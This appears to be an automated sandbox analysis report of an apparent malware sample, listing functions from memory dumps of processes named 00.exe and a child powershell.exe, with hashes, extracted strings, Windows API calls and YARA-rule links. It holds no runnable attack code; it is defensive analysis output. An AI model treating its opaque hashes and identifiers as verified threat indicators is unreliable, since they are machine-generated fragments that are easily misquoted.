Instruction Fuzzy Hash: 02D06735D4425D8ACB10EF989D407AEB772FF96204F0025A68508B7250D7309E508A16

Function 0167ACCF Relevance: 5.2, Strings: 4, Instructions: 240COMMON

Download Yara Rule

Strings

$^q, xrefs: 0167ADDE
$^q, xrefs: 0167ADEA
5, xrefs: 0167AC5B
Hbq, xrefs: 0167AE8A

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: 5$Hbq$$^q$$^q
API String ID: 0-673592099
Opcode ID: 10c6e306c676732bda1f6ea193d29b9882c2ccb65898915725d8565d33c4b6b8
Instruction ID: db3a3f108d21437e0c797cc22c7ee4615bd99894433e02ece86fe73a6b1b6829
Opcode Fuzzy Hash: 10c6e306c676732bda1f6ea193d29b9882c2ccb65898915725d8565d33c4b6b8
Instruction Fuzzy Hash: D571AE727001118BDB18ABBDDC9867E3BABAFC465171C486AE606CB3A5DF34CC429794

Function 01672150 Relevance: 5.2, Strings: 4, Instructions: 202COMMON

Download Yara Rule

Strings

Xbq, xrefs: 01672314
Xbq, xrefs: 016722C7
Xbq, xrefs: 01672248
Xbq, xrefs: 0167220E

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 6bad7781f011916781a1afba7447dfca2331d3d5b039a38513316b55023222f2
Instruction ID: 75e2f0a9a1d256886ebfc5138cf044d97a7b71ed64b79d342d3595b4be12b18a
Opcode Fuzzy Hash: 6bad7781f011916781a1afba7447dfca2331d3d5b039a38513316b55023222f2
Instruction Fuzzy Hash: CB71F431E042198FCF65DFA8CD503AEBBF6BF88300F108569D515A3355EB308A85CB92

Function 01676088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 016760C6
\;^q, xrefs: 0167609E
\;^q, xrefs: 01676094
\;^q, xrefs: 016760BA

Memory Dump Source

Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 44e2563b02c8e4de314d6929ca90b5593db60a381842011b4482a063b6f05b3e
Instruction ID: fa6c620f0575ba1f2d0214a9ac2fda477601de72a074c7c8e9053ff97fa54eb0
Opcode Fuzzy Hash: 44e2563b02c8e4de314d6929ca90b5593db60a381842011b4482a063b6f05b3e
Instruction Fuzzy Hash: 8401D4317009149FEB268E3CCA4492577FBAF88A60325417AE102CF3B4DB72DC46C790

Analysis Process: 00.exePID: 7076, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	90
Total number of Limit Nodes:	4

Executed Functions

Function 0273AD48 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0273AF9E

Strings

,O, xrefs: 0273AEFB
,O, xrefs: 0273AED6

Memory Dump Source

Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2730000_00.jbxd

Similarity

API ID: HandleModule
String ID: ,O$,O
API String ID: 4139908857-201552661
Opcode ID: f7d7b4f4513e8230c4c0eff6bc953bc489b9151aedb7c4325bd1d8a0f04d8901
Instruction ID: 2e027f999586871c243deb94b986cba3fe01725ee0be404f733b5a5770041dd7
Opcode Fuzzy Hash: f7d7b4f4513e8230c4c0eff6bc953bc489b9151aedb7c4325bd1d8a0f04d8901
Instruction Fuzzy Hash: 157133B0A00B058FD725DF2AD15675ABBF1FF88304F008A2DD48ADBA51DB35E945CB91

Function 02734248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 027359C9

Memory Dump Source

Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2730000_00.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8fd2ae5f0ce0f399aa6a64407d7650a68e171c63505f0cac8dcd16c8570ea5e7
Instruction ID: 111ee0bf0f4114c1024c50e6d45c368729764022e9b31a058ada3ec2f3133200
Opcode Fuzzy Hash: 8fd2ae5f0ce0f399aa6a64407d7650a68e171c63505f0cac8dcd16c8570ea5e7
Instruction Fuzzy Hash: 9C41D1B0D0061DCBDB24CFA9C984B9EBBB5BF48308F64806AD408AB255DB756949CF90

Function 0273590D Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 027359C9

Memory Dump Source

Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2730000_00.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 55a7744d1aab1e46a3a52d761b112254c10cdcd5675700c3136717a90b2c6841
Instruction ID: b05a7b633f452f5ae3fb4cf60943d9bd589709fb896e071223753fa4b46d036b
Opcode Fuzzy Hash: 55a7744d1aab1e46a3a52d761b112254c10cdcd5675700c3136717a90b2c6841
Instruction Fuzzy Hash: 5641E2B0D00619CFDB24DFA9C9847CEBBF5BF48304F6480AAD408AB255DB75694ACF90

Function 04E44050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04E44111

Memory Dump Source

Source File: 00000005.00000002.4170040227.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4e40000_00.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e505c91b20f22c0b1040314333e28ac242dcb59a981d189d68e93e422f403f93
Instruction ID: 8a42680916ac6c27ea9759989eb5a59746b27360a015fd4273d8c0ec45382393
Opcode Fuzzy Hash: e505c91b20f22c0b1040314333e28ac242dcb59a981d189d68e93e422f403f93
Instruction Fuzzy Hash: 814157B8A00319DFDB14CF89D848BAABBF5FB88314F24C558D418AB361D334A841CFA1

Function 0273B730 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0273D5E6,?,?,?,?,?), ref: 0273D6A7

Memory Dump Source

Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2730000_00.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d2405dfd2df9d34343e6b595587ba42f27410114c41770242dc1221f935b2465
Instruction ID: b3947a032777d3b5490639c09630d806ef2b6db3bb575ac0d45e34c7e503ff6e
Opcode Fuzzy Hash: d2405dfd2df9d34343e6b595587ba42f27410114c41770242dc1221f935b2465
Instruction Fuzzy Hash: 6121E4B5900248EFDB10CF9AD584ADEBFF4EB48314F14841AE958A7311D374A950CFA5

Function 0273D619 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0273D5E6,?,?,?,?,?), ref: 0273D6A7

Memory Dump Source

Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2730000_00.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5b5d09f7cfbc58797ce7be7f3440be51c6f30d8b53828a9cc528e463b234a3cd
Instruction ID: 922225c5abb8b53988c417d1e1792a282c83b1ac8f687362d006a90f26bd28d6
Opcode Fuzzy Hash: 5b5d09f7cfbc58797ce7be7f3440be51c6f30d8b53828a9cc528e463b234a3cd
Instruction Fuzzy Hash: 1121E2B5900209DFDB10CFAAD584ADEBBF5FB48324F14842AE958A7251C378A950CFA4

Function 0273AF38 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0273AF9E

Memory Dump Source

Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2730000_00.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5f6951a231dff2aa52352f6dd5bc63fc0cf20a07fcdc29364b998314b2c13a51
Instruction ID: 33878d968c95067b81287bcc24365dd5d678886d90480cc4e3f35d5d27837519
Opcode Fuzzy Hash: 5f6951a231dff2aa52352f6dd5bc63fc0cf20a07fcdc29364b998314b2c13a51
Instruction Fuzzy Hash: E71110B6C00749CFCB10CF9AC444ADEFBF4AB89328F10842AD858A7210C379A545CFA5

Function 00E8D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4138951088.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e8d000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd1ce990ac14698d2e67e43f363060f0524f4398ca380abfa65957e625cb1877
Instruction ID: eb800cb0e1a36d6dbe4c68a4698428a500f3b8983bd0b04cce1ed66db01edc9b
Opcode Fuzzy Hash: cd1ce990ac14698d2e67e43f363060f0524f4398ca380abfa65957e625cb1877
Instruction Fuzzy Hash: 4B21F171508240DFCB05EF14D980B26BF65FB98318F20C56AE80D5A296C336D856CBA1

Function 00E9D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4139125185.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e9d000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e481e432c17de7fe99785345720218726c4e312a5f1716702866fe82f8e72c5
Instruction ID: f9a403e81774ab6edcfe0c1bd1bc13a92a01d41a00704ca367325a59bd69fbd1
Opcode Fuzzy Hash: 9e481e432c17de7fe99785345720218726c4e312a5f1716702866fe82f8e72c5
Instruction Fuzzy Hash: 1A21F271608300DFDF14DF24D984B26BBA6FB84318F20C569D84A5B296C33AD847CA61

Function 00E9D2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4139125185.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e9d000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af576032b2d5799a8225b516bcddfced89e3a9d4ac0b31a1aace564ee5c64fec
Instruction ID: 54cf305b91fa581a4259452321e6deafbca062e699205432d404704bdee0d09d
Opcode Fuzzy Hash: af576032b2d5799a8225b516bcddfced89e3a9d4ac0b31a1aace564ee5c64fec
Instruction Fuzzy Hash: 632135B1508204DFDF00DF14DDC0B6ABBA5FB94329F24C669D8496B251C33AD846CAA2

Function 00E9D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4139125185.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e9d000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a90b8c8b1b5cf6a8a8399da1f669ef98af64604704b9ea520d58dd33ddfbabb
Instruction ID: cf6d89a51d8693374fc9fac5f9dc6c5503d6726eff3cb62a76de67f4a91f4aae
Opcode Fuzzy Hash: 9a90b8c8b1b5cf6a8a8399da1f669ef98af64604704b9ea520d58dd33ddfbabb
Instruction Fuzzy Hash: BD21537550D3808FDB12CF24D994715BF71EB46318F28C5DAD8498F6A7C33A984ACB62

Function 00E8D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4138951088.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e8d000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 25385170cfe1dd58b3c02829f1fd2ef48ecb1f0a1b38f9b402ec9d8e530ad5a8
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: AD110372404280CFCB02DF10D9C4B16BF71FB94328F24C6AAD80D0B656C336D85ACBA1

Function 00E9D2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4139125185.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e9d000_00.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction ID: 516aaf47e860a3a60cea990bd5f56813a1891257d388d86af31c17fbd05e61ec
Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction Fuzzy Hash: 0311E275508280CFCB01CF10D9C4B19FF61FB84328F24C6AAD8494B642C33AD80ACB92

Analysis Process: powershell.exePID: 6260, Parent PID: 7076COMMON

Executed Functions

Function 076F1810 Relevance: 5.6, Strings: 4, Instructions: 594COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076F1CB2
4'^q, xrefs: 076F1B4E
4'^q, xrefs: 076F1B58
4'^q, xrefs: 076F1CA8

Memory Dump Source

Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 11bc4817077ef5dc22b9a99792cb1578f851f875a32398d6e2c5fb0ed1199001
Instruction ID: d7d5266a959ef8a63336f951e4acfe2329452cd671ba6ec8b7262de448169dfb
Opcode Fuzzy Hash: 11bc4817077ef5dc22b9a99792cb1578f851f875a32398d6e2c5fb0ed1199001
Instruction Fuzzy Hash: 591227B1B04319DFC7198B7998117ABBBE2AF82350F14C47BD606CB755DA32C942C7A2

Function 047E7611 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

,, xrefs: 047E7638

Memory Dump Source

Source File: 00000006.00000002.1840796317.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: a48763712954d64f6170b33bc4be7bdd5323924be4816a3d29a6b89d104505c3
Instruction ID: 36600b5f35cd6ac5d4e34f0611b2425e0f2e39e266ecd03ce0a4270368efdea1
Opcode Fuzzy Hash: a48763712954d64f6170b33bc4be7bdd5323924be4816a3d29a6b89d104505c3
Instruction Fuzzy Hash: 16316FB4A092898FCB01DF68C8909A9BFB1FF4A310F1985DAD944DB353C235ED45CBA1

Function 076F17F4 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e7b721890a70833d4637b77a4d1c5b2ad79aca8b313899e580edd107a14105f
Instruction ID: f8427d448b4fc5085f6d165d24579c5ba96b01f14af2f180b9980ca75642782a
Opcode Fuzzy Hash: 5e7b721890a70833d4637b77a4d1c5b2ad79aca8b313899e580edd107a14105f
Instruction Fuzzy Hash: CC41FCF0A00206DFCB288F7585016BA7BE3BF42294F5484AADA069F756D731DD41CBE2

Function 047E6CC3 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1840796317.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec42a5a0ad2e3a57f02ff6537665db0c5117ffbcbc87c4c0524e3fe3ed20b88
Instruction ID: ae40b67ce6f168ba186049fab92dc776e6d95a4aaf65774a94f1203528b02e25
Opcode Fuzzy Hash: 4ec42a5a0ad2e3a57f02ff6537665db0c5117ffbcbc87c4c0524e3fe3ed20b88
Instruction Fuzzy Hash: 0F418E34A002089FCB05DFA9D580AADBBF2FF89300F6585A9E5449B366DB35ED46CB50

Function 047E7660 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1840796317.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb7b495df30fca0f02d870a44808d0eb16578894445157f3b4067c3d8eb82f1
Instruction ID: fdfd74c24d7883974235a4c1066a00d49853504014ee25c1f8f491c01d214da9
Opcode Fuzzy Hash: 5bb7b495df30fca0f02d870a44808d0eb16578894445157f3b4067c3d8eb82f1
Instruction Fuzzy Hash: 89317074A093959FCB06EF6DC8909AABFB0EF4A300B0545DBD444DB363C624EC49CBA1

Function 02F2D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1840229080.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3c8ce0b0ced5b734205cd3386d3db1c1224cdab82b2a88fa259bc947633e85
Instruction ID: 16c349199dd51fe97b46997abac2d90e22359ec5ffd01ad283f770e0a02205cf
Opcode Fuzzy Hash: fd3c8ce0b0ced5b734205cd3386d3db1c1224cdab82b2a88fa259bc947633e85
Instruction Fuzzy Hash: F1012B315083109AE710CB25CD84767BF98DF427A4F08C42AEE484B15AC379D849C6B1

Function 02F2D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1840229080.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77bb48d75f9d0194e2b431a39b69c025bf48b74ec98d2623e7d67afa2cb42bc
Instruction ID: 1114e7b424d5070ab7b6dc51f2e6d6d02165e6d3d4d09254e963c252d29d0a52
Opcode Fuzzy Hash: b77bb48d75f9d0194e2b431a39b69c025bf48b74ec98d2623e7d67afa2cb42bc
Instruction Fuzzy Hash: E9015E6140E3C09ED7128B258D94B52BFB4EF47624F1DC0DBD9888F1A7C2699849C772

Function 047E91A2 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1840796317.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb2f209bc85fd3fd8086b1bc26e356353d69b0cb85c324099fa55df23043c342
Instruction ID: 5a68acc05b0c870832dbb36d36ccbb16588e0f52afcdac3b3c9f7367c5d91899
Opcode Fuzzy Hash: cb2f209bc85fd3fd8086b1bc26e356353d69b0cb85c324099fa55df23043c342
Instruction Fuzzy Hash: A1F06275E00104DFCB04CF99C8885A9FBB6FF8C310B258559D95A97711CA36AC66CB91

Function 047E2C06 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1840796317.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1afc928cad530c6ac675de3c5d380c1a56d2c1789335a95976477c750ecaad9
Instruction ID: 53ba39c3650746e52d9ec12f411596e462f106e0127e2c05292c8f6e4a1f20d5
Opcode Fuzzy Hash: f1afc928cad530c6ac675de3c5d380c1a56d2c1789335a95976477c750ecaad9
Instruction Fuzzy Hash: C5F0D435A001099FCB15CF9DD990AEEF7B5FF88324F208299E515A73A1C736AC52CB61

Non-executed Functions

Function 076F1450 Relevance: 10.3, Strings: 8, Instructions: 324COMMON

Download Yara Rule

Strings

$^q, xrefs: 076F1462
$^q, xrefs: 076F1736
tP^q, xrefs: 076F14D9
4'^q, xrefs: 076F165D
tP^q, xrefs: 076F14CD
$^q, xrefs: 076F1494
$^q, xrefs: 076F1488
4'^q, xrefs: 076F1651

Memory Dump Source

Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-3865595929
Opcode ID: 13ec961c6debdae0f61cd0a97fcd404f9d5c509b447a70eca29ca8ed69a538e9
Instruction ID: 58d41488833407ab87b77008246188a2a4d22feb5a8c09b2aa03af338dc6bb2d
Opcode Fuzzy Hash: 13ec961c6debdae0f61cd0a97fcd404f9d5c509b447a70eca29ca8ed69a538e9
Instruction Fuzzy Hash: 0DA158B1704309DFC7299B799810B67BBE6AFC7250F18846BD606CB361DA32CC45C761

Function 076F0550 Relevance: 9.1, Strings: 7, Instructions: 316COMMON

Download Yara Rule

Strings

$^q, xrefs: 076F0758
tP^q, xrefs: 076F079D
4'^q, xrefs: 076F0653
4'^q, xrefs: 076F065F
$^q, xrefs: 076F0764
tP^q, xrefs: 076F07A9
$^q, xrefs: 076F0732

Memory Dump Source

Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 6cb51515d269f14847a44656652c5f4fe01c4a21bd49701b481094d6c2261dc5
Instruction ID: c4f41613682d5a91c6c2bb40b9cddd8aa24973d461ff52d8aed96292818fe3ec
Opcode Fuzzy Hash: 6cb51515d269f14847a44656652c5f4fe01c4a21bd49701b481094d6c2261dc5
Instruction Fuzzy Hash: 96A147B1704355DFCB258A799810676BBE6AFC2210F2484BBD646CB393DA32C845C7A1

Function 076F11A0 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

$^q, xrefs: 076F1327
$^q, xrefs: 076F1352
$^q, xrefs: 076F135E
4'^q, xrefs: 076F124A
4'^q, xrefs: 076F1256

Memory Dump Source

Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: c405e1e74d022c999c7b5eb98830cabe2a3457d087978005ecdcb8bc17dec70a
Instruction ID: 5deeaa9fda5858c3550ec12a21aadd55c6c457e4ac347e92e93fd9b18545ffab
Opcode Fuzzy Hash: c405e1e74d022c999c7b5eb98830cabe2a3457d087978005ecdcb8bc17dec70a
Instruction Fuzzy Hash: CB5108B270430EDFCB294AB9C810767BBE6AFC3650F14846BD646CB751DA32C886C791

Function 076F0308 Relevance: 6.3, Strings: 5, Instructions: 73COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076F0373
$^q, xrefs: 076F035E
$^q, xrefs: 076F0352
4'^q, xrefs: 076F037F
4'^q, xrefs: 076F02EB

Memory Dump Source

Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$$^q$$^q
API String ID: 0-2831958266
Opcode ID: 91cbdd6dbfc217909fedd7385ea36ffa928a2086bc40dbfb919cc6578b93de7c
Instruction ID: d0de142adaf6a79f6c25b61844d0b24fe448fdea8cc00bfb4a65c52e98f8a5a1
Opcode Fuzzy Hash: 91cbdd6dbfc217909fedd7385ea36ffa928a2086bc40dbfb919cc6578b93de7c
Instruction Fuzzy Hash: 83110DB270D7468FC32916385C2416A6BB2AF83955729459BC242DF357CE258C4A83AB

Function 076F32B0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 076F32C2
$^q, xrefs: 076F32DE
$^q, xrefs: 076F3318
$^q, xrefs: 076F330C

Memory Dump Source

Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 0afb958097e7eb3c1559d601aff0801c5a50e7fc3a396b715e6b16472b7a5a63
Instruction ID: 6707472ebdc4ef6293ce37e34203aaf1ce1f5492b3cf2798aa8685ff74970db3
Opcode Fuzzy Hash: 0afb958097e7eb3c1559d601aff0801c5a50e7fc3a396b715e6b16472b7a5a63
Instruction Fuzzy Hash: 422149B27103569BDB34997FDC01B27A6D6ABC5715F24882AA606CF385CD36C8418361

Analysis Process: 00.exePID: 6256, Parent PID: 7076COMMON

Execution Graph

Execution Coverage:	16.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	13.3%
Total number of Nodes:	30
Total number of Limit Nodes:	0

Executed Functions

Function 009A6118 Relevance: 9.7, Strings: 7, Instructions: 910COMMON

Download Yara Rule

Strings

,bq, xrefs: 009A69F2
Hbq, xrefs: 009A650E
(o^q, xrefs: 009A6CA5
(o^q, xrefs: 009A697A
(o^q, xrefs: 009A6988
(o^q, xrefs: 009A6642
,bq, xrefs: 009A6A00

Memory Dump Source

Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9a0000_00.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-1608600535
Opcode ID: ef9f47af0b4b40178a0a304e04b98a4c0b12897ba6efee31a28aad64f717c503
Instruction ID: 9bf67e6a4b406cb1dff6c25615d2b78e0752f10522f53b55a4a2850dec24adb3
Opcode Fuzzy Hash: ef9f47af0b4b40178a0a304e04b98a4c0b12897ba6efee31a28aad64f717c503
Instruction Fuzzy Hash: 23727071A002199FDB14CF69C984AAEBBF6FF89304F188469E545EB3A1DB34DD41CB90

Function 009AB328 Relevance: 6.6, Strings: 5, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 009AB6E5
LjAp, xrefs: 009AB6CF
0oAp, xrefs: 009AB562
PH^q, xrefs: 009AB747
PH^q, xrefs: 009AB758

Memory Dump Source

Source File: 00000008.00000002.4137506313.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9a0000_00.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
